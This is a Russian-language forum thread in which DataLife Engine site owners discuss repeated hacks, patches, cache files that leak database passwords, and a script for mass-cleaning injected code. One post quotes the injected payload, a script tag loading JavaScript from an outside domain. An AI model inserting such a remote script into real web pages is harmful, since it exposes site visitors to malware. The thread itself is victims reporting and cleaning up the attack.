dakter

dakter
Рейтинг
192
Регистрация
08.02.2012
Мне эта заплатка помогла. Уже 7 дней полет нормальный.

7 дней это не показатель. Ломали сайт, поменял все пароли, поставил все заплатки, месяца 2 было все в порядке. И вот сейчас опять началось.

И файла - minify_dbconfig.php.js не появляется. Так что ломают через другую дыру.

Ну вообще-то в тот день полный голяк был. На следующий день опять все нормально, может совпадение, не знаю.

А пользователей в чатах если послушать, то у них чудо на чуде - и баланс-то не пополнить, и в приват не залогиниться и подарки не отображаются...

А на это что скажете, выдумки?

И толку если сообщить свой ник, проверите и ответите что да, платежей не было, толку от этого.

Ни продаж, ни ребиллов сегодня.

вообщем решение что бы не было такой пакости
http://dle-news.ru/bags/v10/1580-pot...le-minify.html

Глупости все, все заплатки стоят, в том числе и эта. Толку от нее если сегодня ночью опять взломали.

После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, при чем цифры в конце названия могут быть любыми. В одном из случаев появилось даже два файла. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.
Посмотрите у себя.У меня вот так.

Такого нет, но есть как-то так:

minify_tabset.js_212e23c50d4922d47798586e59218ddb

minify_highslide.js_e2d0316dedd38426a0bb16cb6c118d81.gz

minify_g=general_059020ae889b0b18ce57154d2adde05c

minify_calendar,tabs,autocomplete,chosen.js_bc9c97ab8a426ca9ee96aac6109cd9f1

Все запустилось отлично, а я уже почти волосы на голове стал рвать.

я нашёл отличный скрипт в инете для массовой чистки базы. сделал два варианта - для внедрений типа script и для object

заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые.

Сегодня ночью опять в новости код впихнули

<script async=\"async\" type=\"text/javascript\" src=\"http://google-statistics.ru/js/6512bd43d9caa6e02c990b0a82652dca.js\"></script>

И самое интересное что в каждой новости он разный, руками чистить тысячи новостей нереально. Поставил скриптик, запустил, 3 секунды и новости чистые, хорошая вещь.

Все повисло, и партнерка и сам сайт. Чем дальше тем веселее.

Пока в кабинет не мог войти ребилы засчитались за это время.

Всего: 1359